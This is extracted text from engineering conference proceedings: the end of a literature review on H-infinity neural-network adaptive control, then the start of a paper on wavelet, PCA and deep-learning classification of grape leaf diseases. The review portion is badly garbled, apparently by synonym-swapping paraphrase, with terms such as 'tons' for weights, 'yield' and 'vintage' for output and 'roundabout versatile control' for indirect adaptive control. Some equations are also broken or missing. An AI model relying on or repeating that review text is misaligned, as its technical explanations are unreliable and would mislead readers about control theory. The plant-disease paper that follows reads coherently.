pretation of an introverted output, reasonable formulating progression ends awake
plausible through neural organization, by unscrambling neuronal arrangement toward
nodes. For invigorating tons, back propagation algorithm be an LMS-as computation
[15].
All through preparation procedure at second layer of hubs primary layer yields
obtain figure up awaiting yield approach closer commencing neural system progres-
sion. The inaccuracy is determined through looking at wanted yield by genuine
vintage.
Subsequently vintage instigates since vintage pivot aimed at revising tons fashion-
able inverse over neuronal organization, fault being exploited. Unity insufficiency
heft modification ailment being tons of extensive number of pivots same deposit
cannot be correspondent, in light of fact that tons would be well-adjusted through
weight aimed at each single hub that partakes indistinguishable tons on individ-
ually sheet. One deficiency weight modification ailment being tons of substantial
quantity of nodes scheduled a parallel sheet cannot stay correspondent, in light of
fact that loads balanced among weight for each node partakes indistinguishable tons
arranged individually layer. Scheduled apiece sheet loads balanced, but mainstream
of neuronal organization’s tons stayed at initial established at zero. Alike scientific
prototypical is partaking apiece sheet a solitary node.
To look through weight space appropriately, introducing tons chaotically being
supplementary motive. The capriciously instated tons style it enormously stiff to
assess fundamental presentation of controller outline.

2.2 Feedback Neural Network

Input (or intermittent or intelligent) systems can have sign going in the two orientation
by exhibiting circles in the system. Criticism systems are unimaginable and can get
exceptionally jumbled. Figuring got from before information are supported again
into the system, which gives them a kind of memory. Input systems are dynamic;
their ‘state’ is changing perpetually until they accomplish a concordance point. They
remain at the agreement point until the information changes and another equalization
ought to be found.
For instance, of feedback network, I can review Hopfield’s network. The primary
utilization of Hopfield’s network is as affiliated memory. An associative memory is
a device which acknowledges an information design and creates a output as the put
away example which is most intently connected with the info. The capacity of the
partner memory is to review the comparing put away example, and after that produce a
reasonable form of the example at the yield. Hopfield networks are ordinarily utilized
A Literature Review on H∞ Neural Network … 345

for those issues with binary example vectors and the information example might be
an uproarious variant of one of the put away examples. In the Hopfield network, the
put away examples are encoded as the weights of network.

3 Adaptive Controllers

A versatile control framework can be characterized as an input framework with the


capacity to modify its qualities in a unique domain in agreement to explicit basis.
Versatile controllers figure out how to improve their exhibition through perceptions
of the procedure leveled out.
Gain scheduling is considered as the simplest form of adaptive control. A process
variable that is not a part of the feedback loop and outlines unlike effective circum-
stances is acknowledged linear controllers for a range of such operating circum-
stances are considered. Parameters or gains are planned and elected supported the
method capricious. The benefit of gain scheduling is that it’s expedient to prac-
tice specifically for renowned plants. The parameters are often reformed in retort to
vagaries within the effective ailment. Gain scheduling may be a widespread optimal
within the proposal of control laws. Systems apply two strategies, in particular, round-
about versatile control and direct versatile control. At the point, while reasonable
replica survives straight versatile control be capable of connected by a subsequent
neural system. At the point when a model must be created, aberrant versatile control
is connected. To build up an angle for union Jacobian be utilized in update calculation
model adjusted by controller.
Mistake ought to be back engendered throughout plant’s Jacobian grid in light
of fact that plant lies between yield blunder that will be limited and versatile neural
system. Jacobian learning be required for methodology.
To trade Jacobian intended for SISO plants incomplete subordinates know how to
utilized. Several learning necessities regarding plant is direct versatile control’s not
kidding disadvantage. The equivalent is not requisite in backhanded versatile control
plot. Dual neuronal systems: a plant emulator along with a supervisor be mandatory
in roundabout versatile control plot. Emulator is a feed forward neural system, in
addition to plant emulator ought to be prepared disconnected amid an adequately
enormous information. To take into account recognizable proof by means of back
spread, as well as to compute plants subordinates, a productive approach is given
by emulator. By thinking concerning greater ones as two systems, constraints of
controller should be balanced. On-line preparing procedure can be execute on two
systems. The backhanded versatile control is especially fascinating in favor of a
spacious assortment control issues. In event that adequate information is accessible,
at that point roundabout technique functions admirably. To combine neural systems
loads both circuitous technique and direct versatile depend scheduled back engen-
dering. Research in region of straight versatile on control be completed inside a shut
circle with expansion fixed-gain controller.
346 P. Kashyap

3.1 Direct and Indirect Adaptive Techniques

Adaptive control, by way of utilized currently by means of control technologists,


is usually confidential as immediate in addition diagonal adaptive methods. Direct
adaptive supervisors partake constraints changed on the double in light of the plant
conduct Fig. 1, recommends an example of direct adaptive control [13]. At this
point, r(t) being reference enter to controller in addition ec(t) is mistake contrast
among plant yield also orientation which being utilized to adjust additions of super-
visor. Further down the direct adaptive oversee classification, model reference adap-
tive control (MRAC) being famous inclination aimed at flying machine. In MRAC,
supervisor is instructed by method for a orientation model and oversee restrictions
being custom fitted toward consent to productivity from orientation model [5, 6]. The
MRAC strategy may moreover has decreased generally speaking execution because
of displaying botches when the plant is underneath the impact of information unset-
tling influences. The MRAC technique has no immediate system to approve the
adjusted controller preceding its utilization on the plant. For confused nonlinear
structures this may likewise prompt impacts.
In aberrant adaptive controller technique, an identifier (ID) prototypical of plant
is utilized to help constraint adjustment procedure of supervisor. “Adaptive control
as a procedure of applying some framework recognizable proof technique to acquire
a model of the procedure and its condition from info output trials and utilizing this
model to plan a controller.” [9, 15] Framework recognizable proof additionally plans
to give better comprehension of elements of the procedure leveled out. Framework
distinguishing proof also adaptive supervisors partake ironic antiquity in addition an
enormous assortment of strategies partake accounted for trendy writing.
In Fig. 2, roundabout adaptive controller plan being displayed. At this point,
mutually plant yield in addition ID model yield being utilized to harmony increases
of controller. The supervisor productions being approved in contradiction of plant
prototypical in addition henceforth checked previously giving it to plant. A self-
tuning supervisor being a case of roundabout adaptive regulator. At this juncture,
blunder distinction among orientation participation also plant production is utilized
to figure following arrangement of plant inputs [10, 11]. Self-tuning controller has
been a prevalent decision for circuitous adaptive control for straight besides nonlinear
frameworks.

Fig. 1 Direct adaptive


control block illustration
_
e(t)
+
r(t) e(t)

controller plant ∑
A Literature Review on H∞ Neural Network … 347

Fig. 2 Indirect adaptive


control block diagram
p
ID
model ∑
+
- _
p(t)
r e(t)

controller plant ∑
+

3.2 Neural Networks for Identification and Control

Werbos clarifies quatern particular highlights of neuronal systems when contrasted


with different methods. They are general mapping capacity of neural systems like
the Taylor arrangement, accessibility of neural system equipment for execution,
educational estimations of NN in addition similitude of NN to mind [10]. Neural
systems partake classified dependent on engineering by way of multi-layer perceptron
(MLP), outspread premise work (RBF) systems in addition intermittent neuronal
system. MLP systems being most straightforward types of neural systems wherein
each nerve cell in a specified sheet is associated with each nerve cell in its neighboring
sheet [11]. A MLP container various sheets in addition distinctive initiation work
aimed at every nerve cell. For most part, RBF systems have a solitary concealed sheet
with fixed actuation capacities normal to all nerve cell in shrouded sheet. Preparing
RBF systems is viewed as quicker in addition system offers prevalent execution in
applications, for example, issue diagnostics. Be that as it may, MLP systems have an
adaptability of looking over a large group of direct and nonlinear enactment capacities
for concealed layer and yield layer neurons when contrasted with fixed sorts for RBF
systems. MLP systems are considered as worldwide approximates when contrasted
with nearby approximations of the RBF systems [2]. Notwithstanding loads count,
RBF systems require information of focus in addition width of premise work for
every neuron.
Repetitive neural systems (RNN) being feed-forward systems with earlier esti-
mations of system information sources also yields nourished back as a component
of present data sources [8]. This gives appropriate maintenance abilities to system
because of which system gives better approximations when contrasted with non-
recursive sort systems. The work exhibited in this survey utilizes alterations of repet-
itive MLP systems dependent on autoregressive structures. Figure 2, demonstrates
structure of a run of mill RNN utilized in this paper. This system comprises of a
solitary concealed layer with quatern nerve cell. This precedent additionally demon-
strates a solitary arrangement of past output in addition a solitary ancient statistic
gave as present information. It being discovered that output of a system has a reliance
348 P. Kashyap

on its past output. Henceforth, with incorporation of past sources of info and output,
the guess capacity of a RNN is viewed as much superior to that of an MLP.
The nuts and bolts of counterfeit neural systems are all around clarified by
Simon Haykin in Neural systems [7, 8]. Independent of design, pursue preparing and
approval as two separate stages. At the point when system is occasionally refreshed
to get dynamically better comprehension of plant although plant being functioning,
it is called ‘on the web’ prepared. The system is called ‘on the web’ prepared when
preparation and the utilization (or approval) stages are isolated in time.
Neural systems have been utilized for framework recognizable proof and control
of different plants, for example, modern robots’ business and warrior airplane, autos,
control age, engines and drives and compound procedure [4]. Werbos has grouped
neural systems for control into five general classes, to be specific:
1. Supervisory controller,
2. Inverse controller,
3. Adaptive controller,
4. Back propagation with utility,
5. Adaptive critic-based controller (Fig. 3).
The most straightforward type of neural system controller is of the supervisory
sort. Here, a system figures out how to mirror another controller (manager) via
preparing with info and yield information from the parent controller. This is regularly
portrayed as a strategy which mimics the conduct of someone else or a framework.
For the most part, supervisory neuronal controller ensures precisely as human master
uncertainty worse. In any case, in a large portion of cases this technique utilizes an

Input Hidden layer Output layer

Plant input Plant output


Z-1

Fig. 3 Recurrent neural network example


A Literature Review on H∞ Neural Network … 349

online prepared prototypical by way of controller in addition subsequently needs


characteristics of manageable.
In ordinary structure, supervisory control is an uncluttered circle control strategy
where system being prepared with info also yield information got from past under-
standing, thus here is not any technique for limiting the mistake between framework
yield and reference amid usage. Cerebellar model verbalization controller (CMAC)
is a kind of supervisory controller technique.

4 H∞ Controller

The “infinity” in H∞ means that this type of control is designed to impose minimax
confine in the sense of decision theory in the frequency domain. The fundamental
delinquent of H∞ control scheme approximately is to augment (by high-quality of
compensator in a typical feedback conformation) some most terrible instance (i.e.,
infinity norm) degree of performance despite fact keeping steadiness [14].
In H∞ control, we contemplate the following closed loop system representation
with an “extended system”:
• w is an exogenous input (m1 × 1) containing at least the reference signal r and
possibly other exogenous signal such as a noise model n.
• z is the performance output (p1 × 1) a virtual output signal only used for design.
• ũ is the control input (m2 × 1), computed by the controller C(s). ỹ is the measured
output (p2 × 1), available to the controller C(s) (Fig. 4).

Fig. 4 H infinity controller


w
z
Extended system

u y

C(s)
350 P. Kashyap

5 Robust Adaptive Control

To achieve robust adaptive control, we require not only identify the nominal plant,
but also quantify the model uncertainty in the adaptive modeling part. Moreover, we
need use both the nominal plant model and the measuring of the model uncertainty
to self-tune the adaptive control law based on H∞ , robust control. The problem is the
equivalence of the two least-squares algorithm, and/or under what conditions they
are equivalent.
An obvious complication for the unification of identification and control in H∞
is the deficit of recursive algorithms using real time data. It is possible to transmute
the frequency domain least-squares algorithm into the time domain one [13].
The use of H∞ control for the control part also gives the opportunity to implement
the resulting control law adaptively because H∞ norm is induced two norms (i.e.,
the size of energy). This is also manifested by the H∞ performance index in time
domain [14]. The problem is clearly the computational complexity associated with
H∞ design that prohibits its implementation in real time. Recall that we do not know
the true system except the identified model that is a function of time t. Thus, the H∞
controller needs to be designed for each identified plant that is simply not possible
for real time implementation. A periodic signal is injected that ensures the persistent
excitation at the plant input.
Then it can be shown that the least-squares algorithm in frequency domain is
equivalent to a specialized recursive least-squares algorithm asymptotically [16].
Fortunately, the amplitude of the periodical signal is not large that keeps the resulting
performance degradation small. Second, the time domain performance index is used
to convert the infinite horizon problem for H∞ control into the finite horizon problem
at each time instance. In this case the two algebraic Riccati equations involved in
H∞ control become Riccati difference equations that can be solved recursively, and
thus allow the real time accomplishment of the robust model reference control.
Under certain conditions, the finite perspective H∞ control converges to infinite
perspective H∞ control [15]. Hence, robust adaptive control can be achieved. Because
the identified model is very inaccurate at the early stage of adaptive control, model
validation is employed to monitor the closed loop system. If the system produces
undesirable size of signals, the H∞ controller designed for finite horizon case must
be shut off. This prevents the system from suffering extremely poor performance
(Fig. 5).

6 Stability Analysis

1: H infinity Adaptive Control Law for Nonlinearities


Assume system dynamics can uttered as per

ẋ = Ax + Bu + D f (x) (1)
A Literature Review on H∞ Neural Network … 351

Fig. 5 The block diagram of y


u plant
robust adaptive control r +

Identified model
+
Adjustable law
(15 degree)
Adjustable law

controller

where A ∈ Rnxn , B ∈ Rnxm , D ∈ Rnxj , x ∈ Rn is scheme state, u ∈ Rm is scheme controller


contribution, with f (x) : R n → R j gratifies subsequent Lipschitz property

 f (x) − f (y)∞ ≤ Lx − y∞ (2)

where L is Lipschitz constant of nonlinearity in addition

 f (0)∞ ≤ K < ∞ (3)

So that K ∈ R+ is an greater bound for f (·) at origin.


Observation 1.1: Memorandum that D permit for an extensive class of vagueness. If
D = B, system model diminishes to system used in MRAC scheme focus to a coor-
dinated vagueness ailment. Assume that near subsists a nominal control regulation
that concentrates A Hurwitz in addition offers desired system tracking characteristics
supposing that scheme vagueness, f (x), is nil.

u n = −K x x + K r r (4)

It being desired to way ideal scheme presentation (f (x) = 0) inside restricted


fault. Toward defining favored behavior, subsequent closed loop reference model
being well-defined

ẋm = Am x + Bm r (5)

where Am = A − BKx and Bm = BKr. In directive to recompense for scheme vague-


ness in addition make certain orientation prototypical is stalked with circumscribed
error, we augment nominal controller law through an adaptive signal. The whole
controller being well-defined as

u = u n − u ad (6)
352 P. Kashyap

wherever uad will defined in a, while. Concerning this controller act to system
dynamics, we redraft scheme dynamics as

ẋ = Am x−Bu ad + B K r r + D f (x) (7)

It is implicit that f (x) is indefinite, but can be approached to an adequate amount


of exactness by a rectilinear in constraints neuronal grid concluded a compressed
set.
We imagine that the neural network approximates f (x) as

(8)

where β(x): Rn → Rs is a vector of recognized basis purposes, W ∈ Rsxj is a conven-


tional of indefinite supreme hefts, in addition ∃ e* > 0 s.t. e(x) < e∗ < ∞∀ x ∈
Dx. The ideal hefts are unspecified to exist in known compact afterward. By this
statement, closed loop dynamics become
 
ẋ = Am x − Bu ad + B K r r + D W T β(x) + e(x) (9)

where W ∈ Rsxj is a established of adaptive hefts to be determined online. Significant


emulation error as ê = x − ẋ. The heft estimation error as Ẁ = ẇ −w, the emulation
error subtleties can then be uttered as

ê´ = Am ê − Bu ad + Dw(t) (10)

Forming error among orientation prototypical also emulator, we describe emulator


tracking error subtleties can be uttered as

ė = Am e + Bu ad + Dw(t) (11)

where w(t) = −ẁ T β(x).


Let method of this controller regulation be well-defined by

ẋe = Ae X e + Be [e w]T
u ad = Ce X e + De [e w]T (12)

This permits for a broad session of linear controller commandments to be


functional. Let heft apprise law for adaptive hefts, be definite as
 
w, β(x)O
W = Proj K eT PD (13)
A Literature Review on H∞ Neural Network … 353

The projection destined on projection operator is W max . If control law being


planned to diminish H∞ norm of transfer function as of w(t) to e(t), then this outlines
complete h∞ adaptive control law.

7 Conclusions

In this work, a broad writing study is directed for the H∞ adaptive control design
utilizing neural systems for frameworks identified with control frameworks. Different
models are talked about in detail and its reasonableness for explicit application
is featured. A neuronal scheme H∞ adaptive controller engineering being deter-
mined that enables a control architect to tune orientation model following qualities
through straight control structure methods, band limit adaptive control sign, also
treat un-coordinated ambiguity a solitary plan construction for frameworks through
an obscure nonlinearity.
Neural systems can be considered as nonlinear capacity approximating instru-
ments (i.e., straight blends of nonlinear premise capacities), where the parameters
of the systems ought to be found by applying streamlining strategies. The advance-
ment is finished concerning the estimate error measure. When all is said in done it
is sufficient to have a solitary concealed layer neural system (MLP, RBF or other)
to gain proficiency with the guess of a nonlinear capacity. In such cases, general
enhancement can be connected to discover the change rules for the synaptic loads.

References

1. Narendra, K. S., & Parthasarathy, K. (1990). Identification and control of dynamical systems
using neural networks. IEEE Transactions on Neural Networks, 1(1), 4–27.
2. Greene, M. E., & Tan, H. (1991). Indirect adaptive control of a two-link robot arm using
regularization neural networks. In Proceedings of the International Conference on Industrial
Electronics, Control and Instrumentation (Vol. 2, pp. 952,135).
3. Tanomaru, J., & Omatu, S. (1991). On the application of neural networks to control and inverted
pendulum: An overview. In Proceedings of the 30th SICE.
4. Jin, Y., Pipe, T., & Winfield, A. (1993). Stable neural network control for manipulators.
Intelligent Systems Engineering, 2(4), 213–222.
5. Brown, R. H., Ruchti, T. L., & Feng, X. (1993). Artificial neural network identification of
partially known + dynamic nonlinear systems. In Proceedings of 32nd Conference on Decision
and Control (Vol. 4, pp. 3694–3699).
6. Nordgren, R. E., & Meckl, P. H. (1993). An analytical comparison of a neural network and a
model-based adaptive controller. IEEE Transactions on Neural Networks, 4(4), 685–694.
7. Yao, B., & Tomizuka, M. (2001). Adaptive robust control of MIMO nonlinear systems in
semi-strict feedback forms. Automatic, 37(9), 1305–1321.
8. Khalil, H. K. (2002). Nonlinear systems. Prentice Hall.
9. Hoagg, J. B., & Bernstein, D. S. (2004). Direct adaptive dynamic compensation for minimum
phase systems with unknown relative degree. In Proceedings of 43rd IEEE Conference on CDC
Decision and Control (Vol. 1, pp. 183–188).
354 P. Kashyap

10. Lavretsky, E., & Hovakimyan, N. (2005). Adaptive compensation of control dependent
modeling uncertainties using time-scale separation. In Proceedings and 44th IEEE Conference
on 2005 European Control Conference Decision and Control CDC-ECC ’05 (pp. 2230–2235),
12–15 December 2005.
11. Volyanskyy, K. Y., Calise, A. J., & Yang, B. J. (2006). A novel q-modification term for adaptive
control. In American Control Conference (p. 5).
12. Cao, C., & Hovakimyan, N. (2006). Design and analysis of a novel l1 adaptive controller,
part1: Control signal and asymptotic stability. In Proceedings of American Control Conference
(pp. 3397–3402), 14–16 June 2006
13. Yu B, Shi Y, Huang J. Ste p tracking control with disturbance rejection for networked control
systems with random time delays. Proceedings of the Joint 48th IEEE Coreference on Decision
and Control and 28th Chinese Control Conference, Shanghai, China, 2009; 4951–4956.
14. Chadli, M., & Guerra, T. M. (2012). LMI solution for robust static output feedback control of
discere Takagi-Sugeno mode ls. IEEE Transactions on Fuzzy Systems, 20(6), 1160–1165.
15. Wu, Z.-G., Shi, P., Su, H., & Chu, J. (2013). Network-based robust passive control for fuzzy
systems with randomly occurring uncertainties. IEEE Transactions on Fuzzy Systems, 21(5),
966–971.
16. Bouarar, T., Guelton, K., & Manamanni N. (2013). Robust non-quadratic static output feed-
back controller design for Takagi-Sugeno systems using descriptor redundancy. Engineering
Applications of Artificial Intelligence, 26(2), 739–756.
A Novel DWT and Deep Learning Based
Feature Extraction Technique for Plant
Disease Identification

Kirti, Navin Rajpal, and Jyotsna Yadav

Abstract Disease detection in plants has been proven to be a very cumbersome


job due to numerous limitations for example noise, illumination variations, color
variations etc. Therefore, robust feature extraction becomes a difficult task when
colored images are utilized for classification. In this work, a novel feature extraction
technique is proposed where large scale coefficients based on discrete wavelet trans-
form (DWT) are extracted from each channel of digital colored leaf images. Then,
further significant features are selected using principal component analysis (PCA)
of selected approximation coefficients from red, green and blue components of plant
leaf images using orthogonal wavelets. Deep neural networks (DNNs) are further
utilized for analysis of robust DWT-PCA colored image features and classification
purpose because of the advantages that they perform better with large datasets. DNN
architectures are pre-trained architectures which are trained on ImageNet database
which contains millions of real-life objects training features. In this work, six types
of pre-trained DNN architectures are used for extensive experimental analysis. The
proposed plant disease identification system for colored images yields an accuracy
up to 99% and performed much better than the presently existing systems.

Keywords Disease recognition · DWT · PCA · Plant Village · Deep neural


networks (DNNs) · Multi-resolution analysis

1 Introduction

The agriculture sector contributes majorly in the income sources of India and hence
the contribution of agriculture sector in the national economy is indisputable. The thir-
teen percent of the GDP contribution is depending on agricultural sector. However,

Kirti · N. Rajpal · J. Yadav (B)


University School of Information, Communication and Technology, Guru Gobind Singh
Indraprastha University, Delhi, India
e-mail: jyotsnayadav@ipu.ac.in
N. Rajpal
e-mail: navin.rajpal@ipu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 355
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_29
356 Kirti et al.

the diseases caused by various pathogens to the plants ruins the yield up to 20–40%.
The grape vines are one of the key founts of the agricultural and vine industries. The
quantity and quality of vines should be up to the mark of the market standards.
The detection of diseases in plants often mis-calculated when the manual detection
is used and hence there is a need of such automated systems which can detect the
diseases with the least number of manual interventions [1]. One of the main issues
in disease detection is the similarity in the symptoms of different diseases. It is
very hard to differentiate one disease from another disease [2]. So, the emphasis
should be more on feature extraction part of the system. The significant features
provide high-accurate system. Han and Shi computed the features using HSV, Lab
and YCbCr models which provided 91.3% accuracy with support vector machine
(SVM) and deep convolutional networks (DCNNs) [3]. Linear and quadratic local
binary patterns were used by Veerashetty and Patil for creating a feature vector which
was invariant to the rotation, illumination and scaling changes. The accuracy of 95%
was computed with multi-Kernel SVM classifier [4]. Thanjavur used DWT, SIFT
and GLCM features for detection of diseases in paddy fields. The system achieved
96.83% classification accuracy with KNN, ANN, NB and Multi SVM [5].
A system with color and grayscale information features was developed by Ghazal
and Mahmoud which used the pre-determined region of interest (ROI) pixels for the
objective of determining the probabilities for the pixels. The labels were fined with
Gauss-Markov random field model. The dice similarity coefficient has provided
the recognition rate of 90% [6]. Xio and Ma extracted the 21 features for the
processing which included the features based on color, texture and morphology.
Principal component analysis (PCA) was utilized for the purpose of reducing the
dimensionality. The classification accuracy was obtained as 95.63% with SVM and
back-propagation neural networks (BPNNs) [7]. The system developed by Ma and
Du used conventional as well as deep learning classifiers. The features extracted
for conventional classifiers were the average, contrast, correlation, energy, etc. from
different channels of different color models. The highest accuracy obtained using
SVM, random forest and AlexNet was 93.4% [8]. Hassanein and Gaber developed
a system for tomato disease detection which extracted the features using Gabor
Transforms and the feature selection process was done using the moth flame opti-
mization and rough set. The accuracy of 90.5% was achieved using KNN and SVM
[9]. Okra and Bitter gourd diseases were detected by Mondal and Kole using an
entropy discretization Method. Correlation coefficient was computed and provided a
recognition rate of 96.78% [10]. Yao and Chen developed a system which employed
the HOG, Gabor and LBP for feature extraction and provided an accuracy of 90.7%
[11]. The textural features LBP, CLBP and LTP was used by Kirti to detect the leaf
scorch disease in the strawberry plant. The comparison among all the three-feature
extraction technique was made on the basis of the accuracy computed by SVM Clas-
sifier. The highest accuracy achieved was 97.60% [12]. Revathi and Hemlata utilized
the swarm optimization in combination with SVM, BPN and fuzzy logic to detect the
disease in cotton plants which achieved an accuracy of 94% [13]. Zhou and Kaneko
detected foliar disease in Sugar Beet by using three features in combination with
A Novel DWT and Deep Learning Based … 357

L*a*b* color model and classified the images using SVM and template matching.
The algorithm provided an accuracy of 97.44% [14].
The residual work is organized in the subsequent way. The preliminary descrip-
tion, block diagram and the algorithm description for the proposed novel DWT-DNN
technique along with the process of selection of the best decomposition level and
sub-band selection is explained in Sect. 2. Description about the dataset and system
specifications are mentioned in Sect. 3 along with the comparison graphs of perfor-
mance among 2 wavelets for level and sub-band selections are presented. The results
are discussed in the same section. The conclusion is presented in Sect. 4.

2 Research Methodology of Proposed Novel DWT


and Deep Learning Based Feature Extraction Technique
for Plant Disease Identification

In this section, the preliminary description of robust features extraction large scale
based on DWT, PCA based large scale RGB feature extraction and deep learning
based classification technique for plant disease identification is presented.

2.1 Robust Feature Extraction Based on Large Scale DWT


for Colored Images of Plants (Healthy/Diseased) Leaf
Images

The colored images (R, G, B individual channels) of plant leaves were decomposed
up to four levels. Since, the decomposition of the image is proven to be the best
alternative to determine the high-detail features and it also provides scale-invariant
interpretation of the leaf image. Discrete wavelet transform (DWT) is employed
aimed at the investigation of different sub bands that can help in excluding out
the significant distinct features of the leaves efficiently for the disease detection.
Images were broken down into 4 different coefficients, as illustrated in Fig. 1, which
are high frequency and low frequency (in three directions) in nature. The DWT
(dwt (z)) is attained by exploitation of the function (s(z)) which is also called as
the scaling function and the function (w(z)) which represents the wavelet in Eq. 1
at decomposition level d:
 d    d  
dwt(z) = ld (x)0.2 2 s 2d z − x + h d (x)0.2 2 w 2d z − x (1)
x x

In Eq. 1, dwt(z) is decomposed at level which is providing ld (x), i.e., coefficients


that have low frequency and h d (x), i.e., coefficients with high frequency, respectively.
358 Kirti et al.

Fig. 1 Illustration of multi-resolution analysis through discrete wavelet transform (DWT)

This decomposition yields various frequency coefficients at different scales of


the image. At level 1, the approximation coefficient (cA) which has low frequency
was computed. Then, the detail coefficients (cH, cV and cD) with low frequency are
computed subsequently. The further decompositions at subsequent levels provide
more significant and discriminating approximation and detail coefficients. These
are of 2 types—the high-scale low frequency Approximation coefficient, i.e., cA
(Approximation) which provides the significant and high information about the leaf
image and the low scale high frequency Detail coefficients, i.e., cH (Horizontal),
cV (Vertical) and cD (Diagonal) [15–17] as shown in Fig. 1. The most important
advantage of separating out these coefficients from the leaf images is that the features
can be segregated out which contribute the most, as cV and cH sub bands are sensitive
to pose variations, respectively, and the large amount of the noise effect is due to cD
sub band. Two wavelets namely Daubechies and Biorthogonal were used because of
the advantages that those run faster than other the feature extraction techniques and
decompose the image into higher frequency and lower frequency components which
helps in determining more significant features. The approximation coefficient cA of
the first stage was given as input to the next stage DWT and so on.

2.2 Selection of Features in Reduced Sub-Space for Efficient


Feature Vector Formation Using Principal Component
Analysis (PCA)

As discussed above, the dimensionality of colored plant image features was very
high. After performing DWT and selecting large scale coefficients, there was a need
to reduce the feature sub-space, as it has been observed that computational time
A Novel DWT and Deep Learning Based … 359

of CPU was still very high. The processor was unable to handle a high amount of
processing of large sized dataset features. Therefore, principal component analysis
was utilized for reducing the size of training and test features of image space. The
main concept in the process of determining the PCA consists of the reduction of
dimensionality present in the input dataset which may contain a very high number of
interrelated components, while obtaining significant number of variations existing
in it. The above-mentioned task is done by converting the image as a linear vector
weights by transforming it into a single-dimensional column vector. The space of
training i = [1 . . . I ] represents the training images as column vectors IMi=[1...I ]
integrated to create a 2D matrix and subtracted from the mean
 m of all image vectors.

The reduction in dimension was done using the concept K × K  N × N  with
the covariance matrix K × K as shown in Eq. 2. This space was called as the reduced
sub-space and provided the Eigen vectors corresponding to the Eigen values which
were normalized which were used to form a projection between the sub-spaces of
the training and testing sets. The classification is performed by pre-trained DNNs.


I
Cm = (m − IMi ).(m − IMi )T (2)
i=1

2.3 Significant Feature Vector Formulation


and Classification Based on DNNs

The importance of classification phase is one of the crucial steps in disease detection
system since in this phase the system assigns the class labels to the test images and
compute the validation accuracy. The deep neural networks are excellent in handling
the large sized datasets to obtain the significant features and provides better accuracy
and results than other classifiers. These are applied using transfer learning and fine-
tuned for the desired system. It automatically learns the robustness hidden in the
variations of the input dataset. The six types of pre-trained deep neural networks
architectures are utilized to form feature vector formulation and classification, i.e.,
AlexNet, GoogleNet, ResNet-50, ResNet-101, Inception V3 and Xception [18]. The
pre-trained models are selected on the basis of the increment in accuracy and number
of parameters. These architectures were pre-trained on ImageNet database which
contains millions of images of 1000 different classes objects and the class weights
that are trained using the previous problems, used for the system and fine-tuned
according to the problem.
360 Kirti et al.

2.4 Proposed Novel DWT and Deep Learning Based


Technique for Identification of Diseases in Plants

The proposed novel technique based on DWT and deep learning designed for extrac-
tion of the features and classification for identification of diseases in plants mentioned
below incorporates multi-resolution analysis of the images, dimensionality reduc-
tion process and the feature vector formulation and classification which can help in
improving the accuracy of the system, illustrated in Fig. 2. The algorithm description
is mentioned as:
1. The RGB images were loaded into the system and passed for the processing.
2. The R, G and B channels were separated out of the image.
3. The images obtained were decomposed up to 4 levels.
4. The multi-resolution analysis of the images was done using 2 wavelets, i.e., db4
and bior 1.5.
5. The dimensionality reduction process was then applied on the computed
coefficients by applying principal component analysis.
6. The R, G and B components were then concatenated to obtain a single RGB
image which was then passed into 6 types of DNNs.
7. Accuracy was computed with each DNN for every sub band and decomposition
level.

Fig. 2 Proposed novel DWT and deep learning based feature extraction technique for plant disease
identification
A Novel DWT and Deep Learning Based … 361

Fig. 3 Plant village dataset contained grape vine leaves: a healthy, b affected from black rot disease,
c affected from Esca (Black Measles), d affected from leaf blight disease (Isariopsis Leaf Spot)

3 Experiments and Discussions

In this section, the details about the dataset and the system specifications are provided.
The results between the two wavelets for the selection of level and sub-band selection
are discussed.

3.1 Dataset

The grape dataset from plant village database was used for the work [19]. The dataset
contained a total of 1600 RGB/color images that were used, consisted of 400 images
in each class. There were 4 distinct classes. The first class was labeled as the healthy
class and the remaining 3 classes were the ones with the images of diseased leaves.
The 3 diseases affected the grape leaves were black rot disease, Esca (Black Measles)
disease and the leaf blight (Isariopsis Leaf Spot). The images were in.jpeg format
with a resolution of 256 × 256 pixels. The images seemed to be captured with a
monochrome background with no complexities as demonstrated in Fig. 3.

3.2 System Specifications

A system with 8 GB RAM, 2 GHz clock speed, 64-bit Intel core i7 was used for the
experiments. The processing is done with MatLab 2020 installed with the system.
The 2 types of experiments are done on the basis of wavelets.
362 Kirti et al.

3.3 DWT Sub Band Selection and Level of Decomposition


Selection with Daubechies Wavelet (db4)
and Biorthogonal (Bior1.5) Wavelet with DNNs

The images obtained from the concatenation of all the components (R, G, B) were
then passed to the next stage where the DNNs are applied to do the further processing.
Accuracy was computed for different decomposition levels with different sub bands
and DNNs. The highest accuracy achieved by db4 with level 1 decomposition was
with the Inception V3 DNN at the cH sub band, i.e., 98.96%, with level 2 decom-
position was with the ResNet 101 DNN at the cA sub band, i.e., 98.13%, with level
3 decomposition was with the Inception V3 DNN at the cA sub band, i.e., 97.92%,
with level 4 decomposition was with the ResNet 50 & ResNet 101 DNN at the cA
sub band, i.e., 97.08%.
The second wavelet used in multi-resolution analysis was the biorthogonal
wavelet. The version bior 1.5 was applied on the images and further decomposi-
tion levels. The highest accuracy achieved with level 1 decomposition was with the
Inception V3 DNN at the cA and cD sub band, i.e., 98.96%, with level 2 decompo-
sition was with the ResNet 101 DNN at the cV sub band, i.e., 98.54%, with level
3 decomposition is with the Inception V3 DNN at the cD sub band, i.e., 98.54%,
with level 4 decomposition was with the Inception V3 DNN at the cV sub band, i.e.,
97.29%.
The system with db4 wavelet provided the highest accuracy of 98.96% when
compared with every sub band with each decomposition level. The cH sub band and
the decomposition level 1 was found to have the most significant features which can
provide the highest accuracy. The system with bior 1.5 wavelet provided the highest
accuracy of 98.96% when compared with every sub band with each decomposition
level. The cD sub band and the decomposition level 1 was found to have the most
significant features which can provide the highest accuracy, as shown in Fig. 4.

3.4 Comparison of Accuracy Among the 2 Wavelets


with Respect of Levels and Sub Bands

The comparison of accuracy between the wavelets db4 and bior 1.5 was made to
determine the best decomposition level and sub bands.
It had been found that the Level 1 decomposition was proven to be the best
decomposition level where the system provided the best accuracy of 98.96%, as
shown in Fig. 5. The other comparison was done between db4 and bior 1.5 wavelets
to determine the best sub band. It had been found that the cA sub band was proven
to be the best decomposition level where the system provided the best accuracy of
98.80%. The wavelet db4 was determined to be the best for the particular system as
it provided the highest accuracy among both the wavelets, i.e., 98.96%.
A Novel DWT and Deep Learning Based … 363

Fig. 4 Comparison of accuracy among sub band and level with a db4 wavelet, b bior1.5 wavelet
364 Kirti et al.

